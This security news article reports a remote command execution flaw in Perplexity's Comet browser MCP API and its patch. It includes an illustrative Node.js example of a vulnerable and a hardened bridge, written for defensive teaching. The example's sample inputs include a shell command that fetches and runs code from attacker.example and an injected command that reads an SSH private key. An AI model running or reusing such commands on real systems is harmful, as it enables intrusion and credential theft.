Concise Cyber

Perplexity Comet Browser Vulnerability Exposed Users to System-Level Attacks

Critical Security Flaw Discovered in Perplexity Comet Browser

A significant security vulnerability was discovered in Perplexity’s Comet browser that exposed users to system-level attacks. Security researchers identified the flaw and reported it directly to Perplexity. The vulnerability allowed remote command execution on a user’s machine through the browser’s built-in Model Context Protocol (MCP) API, the protocol used to connect an AI agent to local tools and services.

The issue affected all versions of the Comet browser released before the security patch. The attack required no interaction beyond loading a page: a user who navigated to a specially crafted webpage could have their system compromised without clicking anything further.

Technical Details of the MCP API Exploit

The root cause was an improperly secured MCP API endpoint. The API, designed to give the browser’s agent advanced control of the host, did not adequately authenticate its callers or sanitize the input it received. As a result, remote web content could submit commands that the browser executed on the host operating system with the privileges of the logged-in user. That is not root, but it is everything the user can reach: local files, credentials stored in the browser profile, and the ability to set up persistence.

The researchers who found the flaw demonstrated it with a proof of concept. It confirmed that the endpoint gave an attacker a direct path from web content to command execution on the host, bypassing the separation a browser is supposed to maintain between web pages and the operating system.
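The design failure described above is a privileged browser-to-host bridge that takes a command from whoever can reach it. The following Node.js example is added here to illustrate that pattern and its hardened counterpart; it is not Perplexity’s code and does not reproduce the Comet API. All names in it (the bridge functions, ALLOWED_CALLERS, ALLOWED_SERVERS, the message shape) are hypothetical, and nothing is actually executed: both bridges return the spawn specification they would hand to a process launcher, so the example runs offline. The hardened version applies the two controls the report says were missing, caller authentication and input validation, and additionally replaces a free-form executable path with a fixed allowlist so that web content can choose only a logical server name, never what runs.

```javascript
// Added example, not Perplexity's code. Models a privileged bridge that
// launches local MCP servers (commonly stdio subprocesses) on behalf of
// browser content. Names and message shapes are hypothetical. Nothing is
// spawned: each bridge returns the spawn spec it *would* pass to
// child_process.spawn, so the behaviour can be inspected offline.

// Hypothetical allowlist of callers permitted to reach the privileged API.
// A real implementation checks the origin/extension ID that the browser
// attaches to the message, never a value the caller supplies itself.
const ALLOWED_CALLERS = new Set(["chrome-extension://builtin-agent-extension"]);

// Hypothetical allowlist of launchable servers: logical name -> fixed
// executable plus a pattern every argument must match.
const ALLOWED_SERVERS = {
  filesystem: {
    executable: "/opt/mcp/mcp-filesystem",
    argPattern: /^--root=\/home\/[a-z0-9_-]+\/Documents$/,
  },
  calendar: {
    executable: "/opt/mcp/mcp-calendar",
    argPattern: /^--account=[a-z0-9._-]+@example\.com$/,
  },
};

// Vulnerable shape: trusts any caller and passes executable and arguments
// straight through. Whoever can reach this endpoint decides what runs.
function vulnerableBridge(message) {
  return { executable: message.command, args: message.args };
}

// Hardened shape: verify the caller, map a logical server name to a fixed
// executable, and validate each argument against the server's allowlist.
function hardenedBridge(message, sender) {
  if (!sender || !ALLOWED_CALLERS.has(sender.origin)) {
    throw new Error(`caller not permitted: ${sender && sender.origin}`);
  }
  const server = ALLOWED_SERVERS[message.server];
  if (!server) {
    throw new Error(`unknown server: ${String(message.server)}`);
  }
  const argsOk =
    Array.isArray(message.args) &&
    message.args.every((a) => typeof a === "string" && server.argPattern.test(a));
  if (!argsOk) {
    throw new Error("argument rejected by allowlist");
  }
  return { executable: server.executable, args: [...message.args] };
}

// Constructed sample messages (not captured from any real product).
const hostileMessage = {
  command: "/bin/sh",
  args: ["-c", "curl http://attacker.example/x | sh"],
};
const legitimateMessage = { server: "filesystem", args: ["--root=/home/alice/Documents"] };
const escapingMessage = {
  server: "filesystem",
  args: ["--root=/home/alice/Documents; cat ~/.ssh/id_rsa"],
};
const trustedSender = { origin: "chrome-extension://builtin-agent-extension" };
const webPageSender = { origin: "https://evil.example" };

// Runs each message through both bridges and collects the outcomes.
function demo() {
  const results = {};
  // The vulnerable bridge happily returns a shell with attacker-chosen args.
  results.vulnerable = vulnerableBridge(hostileMessage);
  // The hardened bridge accepts the well-formed request from the trusted caller...
  results.legit = hardenedBridge(legitimateMessage, trustedSender);
  // ...and rejects the untrusted caller, the free-form command, and the
  // argument that tries to smuggle a second command.
  const cases = [
    ["webPage", legitimateMessage, webPageSender],
    ["hostile", hostileMessage, trustedSender],
    ["escaping", escapingMessage, trustedSender],
  ];
  for (const [name, msg, sender] of cases) {
    try {
      hardenedBridge(msg, sender);
      results[name] = "allowed";
    } catch (e) {
      results[name] = `rejected: ${e.message}`;
    }
  }
  return results;
}

console.log(demo());
```

Two points are worth noting when applying this to a real browser API. First, the caller check must rely on an identity the browser itself attaches to the message; anything the page can set in the payload is not authentication. Second, validating arguments with an anchored pattern (note the `$` on each regex) is what stops the `escaping` case, where a well-formed prefix is followed by an injected command.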

Perplexity Issues Urgent Patch and Advisory

In response to the disclosure, Perplexity acknowledged the severity of the vulnerability, and its development team promptly issued a security update to address it. The fix shipped in Comet browser version 1.2.5.

Perplexity has issued a formal security advisory urging all Comet users to update to the latest version immediately. The update corrects the API’s authentication and input-handling failings, closing the vector for this specific system-level attack. No user data was reported compromised as a result of this vulnerability before the patch was deployed.

Source: https://www.helpnetsecurity.com/2025/11/20/perplexity-comet-browser-security-mcp-api/